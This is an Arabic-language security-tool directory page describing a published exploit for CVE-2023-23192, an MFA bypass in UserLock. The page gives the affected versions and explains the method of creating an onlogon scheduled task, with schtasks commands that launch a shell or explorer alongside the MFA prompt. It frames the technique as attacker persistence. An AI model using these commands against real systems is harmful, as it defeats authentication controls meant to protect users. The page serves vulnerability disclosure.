Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-23192 — CVE-2023-23192 | Kitploit
أدوات/GitHubGitHub/pinarsadioglu/cve-2023-23192
تصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقة
GitHubpinarsadioglu/cve-2023-23192

CVE-2023-23192

CVE-2023-23192

عرض المستودع
13348منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-23192

CVE-2023-23192- Userlock - تجاوز المصادقة متعددة العوامل (MFA)

عنوان الاستغلال: Userlock - تجاوز المصادقة متعددة العوامل (MFA)

التاريخ: 01/11/2023

مؤلف الاستغلال: Pinar Sadioglu

الصفحة الرئيسية للبائع: https://www.isdecisions.com/products/userlock/help/#

الإصدار: < = 11.0.1.40

تم الاختبار على: Windows 10

البرنامج : تم الاختبار باستخدام 'Desktop agent' من Userlock لحماية الجلسات التفاعلية على محطات العمل أو خوادم الطرفية.

CVE : CVE-2023-23192

MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task

الصلاحيات المطلوبة: Administrator, Root

https://nvd.nist.gov/vuln/detail/CVE-2023-23192

الوصف: يُعد Userlock حلاً للمصادقة متعددة العوامل (MFA) لبيئات Windows Active Directory والبيئات السحابية لمنع الوصول غير المصرح به وغير المرغوب فيه. وهو يتيح مصادقة مخصصة ثنائية العوامل (2FA) على تسجيل دخول Windows، وسطح المكتب البعيد (RDP وRD Gateway)، وIIS، والشبكات الافتراضية الخاصة (VPN)، والتطبيقات السحابية. يتيح لك Userlock تطبيق MFA على عمليات تسجيل دخول Active Directory على محطات العمل والخوادم المنضمة إلى المجال. تظهر نافذة حوار يمكنك من خلالها إدخال رمز OTP من تطبيق المصادقة (Authenticator App) عند أول تسجيل دخول يومي إلى محطة العمل. يتكامل Userlock مع عملية تسجيل الدخول لتوفير مصادقة ثنائية العوامل.

تُعد جدولة المهام واحدة من أكثر الاستراتيجيات استغلالًا التي يستخدمها المهاجمون لبناء استمرارية (persistence) على جهاز الضحية. وكثيرًا ما يستخدم الخصوم هذه الاستراتيجية لتجنب الاكتشاف الآلي، والحفاظ على الاستمرارية، وتنفيذ هجمات مفاجئة بعد فترات طويلة من التخفي.

الثغرة:

أنشئ مهمة مجدولة يتم تنفيذها بعد تسجيل دخول أي مستخدم.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

mfa

بعد تسجيل الدخول بنجاح باستخدام بيانات اعتماد المجال، يتم استدعاء cmd.exe المجدول مع مربع حوار Userlock MFA.

root@kitploit:~
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"
تنزيل الأداة